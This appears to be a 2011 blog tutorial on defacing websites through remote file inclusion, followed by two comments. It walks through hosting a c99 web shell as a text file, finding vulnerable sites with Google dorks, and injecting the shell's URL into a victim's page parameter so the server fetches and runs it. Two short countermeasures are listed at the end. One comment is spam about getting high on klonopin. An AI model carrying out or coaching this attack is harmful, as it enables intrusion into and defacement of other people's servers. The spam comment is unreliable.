Saturday, April 30, 2011
Defacing Website Using RFI | Remote File Inclusion Attacks | Explained.
Do you like this story?
Now signup for a account on any free web hosting site . Say 110mb.com. Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of shell you uploaded.
http://username.110mb.com/shell.php
and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.
Both images are showing the filemanager, In Ist I am accesing by signing into my account and 2nd just by accessing shell without logging into.
I just wanted to show you that Imagine if anybody somehow upload this kind of shell on your server, how deadly it can be. Here comes the concept of Remote File Inclusion into picture.
Note:Your account might be suspended after uploading such shells.
What is Remote File Inclusion ?
As clear from the name, Remote File inclusion means 'including a remote file' . RFI is a vulneribility found in websites that allow attackers to include a remote file on the webserver. This may lead to remote code execution and complete compromise of system.
How to perform attack ?
Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.
Step 2. Search for the vulnerable site using google dorks. like
inurl:index.php?id=
inurl:index.php?page=
You can use automated tools for the same.
Step3. Lets say you got any site like
http://www.victim.com/index.php?page=anything
Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?
Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.
Possible Countermeasures :
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini .
This post was written by: Ashif Ismail
Ashif Ismail is a professional blogger, Software Programmer and front end web developer. Follow him on Twitter
Subscribe to:
Post Comments (Atom)
2 Responses to “Defacing Website Using RFI | Remote File Inclusion Attacks | Explained.”
September 23, 2011 at 10:02 PM
RFI remote hacking is new techniques. Most of the people do this kind of activities.
January 26, 2014 at 7:10 PM
generic klonopin will 4mg of klonopin get you high - what does a 2mg klonopin look like
Post a Comment